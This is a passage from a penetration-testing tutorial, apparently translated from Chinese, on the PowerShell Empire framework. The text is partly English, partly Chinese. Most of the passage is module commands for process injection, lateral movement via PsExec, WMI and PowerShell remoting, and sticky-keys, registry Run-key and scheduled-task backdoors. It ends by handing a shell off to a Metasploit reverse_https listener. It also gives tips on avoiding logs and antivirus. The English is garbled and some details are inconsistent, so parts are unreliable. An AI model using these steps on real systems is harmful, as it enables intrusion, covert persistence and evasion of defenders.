Session injection
We can use to process usemodule management / psinject injection module, get permissions
Listeners settings and ProcID these two parameters, ProcID here is that before the CMD of pid, bounce back to the domain user rights shell
usemodule management/psinject
set Listener Micr067
set ProcID 3768
execute
3.Invoke-PsExec
PsExec drawback is the basic anti-virus software can detect, log and will leave, and the need to open admin $ 445 port sharing.
The advantage is you can return to the SYSTEM privileges directly.
Use the premise of this module is already obtain local administrator privileges, or even a domain administrator account, and then continued in order to further penetrate the entire network.
We tested before it will look Agents currently, there is a machine called a server WIN-PC2, as shown in FIG.
Use module usemodule lateral_movement / invoke_psexec art permeation another machine
To set up here under the name of the machine and listen, pay attention to where the machine name is the full name of the machine, the command completes successfully obtained a new session
set ComputerName WIN-DC.payload.com
set Listener Micr067
execute
Because I was the last session administrator privileges, use psexec module directly to the system administrator privileges to elevate privileges
4.Invoke-WMI
WMI security than PsExec, all window systems enable the service, when the attacker uses wmiexec to attack, Windows operating system default will not be recorded in the log, this means that no log can be done to attack, and attack without having to write scripts to disk, with a high concealment. But the firewall is turned on will not connect.
usemodule lateral_movement/invoke_wmi
set Listener Micr067
execute
WMI还有一个usemodule lateral_movement/invoke_wmi_debugger模块,是使用WMI去设置五个Windows Accessibility可执行文件中任意一个的调试器。这些可执行文件包括sethc.exe(粘滞键,五下shift可触发),narrator.exe(文本转语音,Utilman接口激活)、Utilman.exe(windows辅助管理器,Win+U启用),Osk.exe(虚拟键盘,Utilman接口启用)、Magnify.exe(放大镜,Utilman接口启用)。相关配置参数如下:
5.Powershell Remoting
PowerShell remoting是Powershell的远程管理功能,开启Windows远程管理服务WinRM会监听5985端口,该服务默认在Windows Server 2012中是启动的,在Windows Server 2003、2008和2008 R2需要通过手动启动。
如果目标主机启用了PSRemoting,或者拥有启用它的权限的凭据,则可以使用他来进行横向渗透,
开启PowerShell remoting功能
Enable-PSRemoting
usemodule lateral_movement/invoke_psremoting
set ComputerName WIN-PC2.payload.com
set Listener Micr067
execute
0×08. 后门
1.权限持久性劫持shift后门
usemodule lateral_movement/invoke_wmi_debugger
set ComputerName WIN-DC.payload.com
set TargetBinary sethc.exe
execute
运行后,在目标主机远程登录窗口按5次shift即可触发后门,即可进入cmd命令窗口。
注意:sethc.exe也可替换为以下选项。
A.Utilman.exe(快捷键为: Win + U)
B.osk.exe(屏幕上的键盘Win + U启动再选择)
C.Narrator.exe (启动讲述人Win + U启动再选择)
D.Magnify.exe(放大镜Win + U启动再选择)
2.注册表注入后门
使用usemodule persistence/userland/registry模块,运行后会在目标主机启动项添加一个命令
usemodule persistence/userland/registry
set Listener Micr067
set RegPath HKCU:Software\Microsoft\Windows\CurrentVersion\Run
execute
运行后当我们登陆系统时候就会运行,反弹回来
3.计划任务获得系统权限
在实际渗透中,运行该模块时杀软会有提示。
usemodule persistence/elevated/schtasks
Set DailyTime 22:50
set Listener Micr067
execute
命令执行完毕返回一个高权限的shell
这里如果把set RegPath 的参数改为HKCU:SOFTWARE\Microsoft\Windows\CurrentVersion\Run,那么就会在22:35分添加一个注册表注入后门。
0×09. Empire反弹回Metasploit
实际渗透中,当拿到webshell上传的MSF客户端无法绕过目标机杀软时,可以使用powershell来绕过也可以执行Empire的payload来绕过,成功之后再使用Empire的模块将其反弹回Metasploit。
usemodule code_execution/invoke_shellcode
set Lhost 192.168.190.133 # Lhost为msf所在主机ip
set Lport 1521
execute
在MSF上设置监听,运行后,就可以收到Empire反弹回来的shell了
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set Lhost 192.168.190.133
set lport 1521
run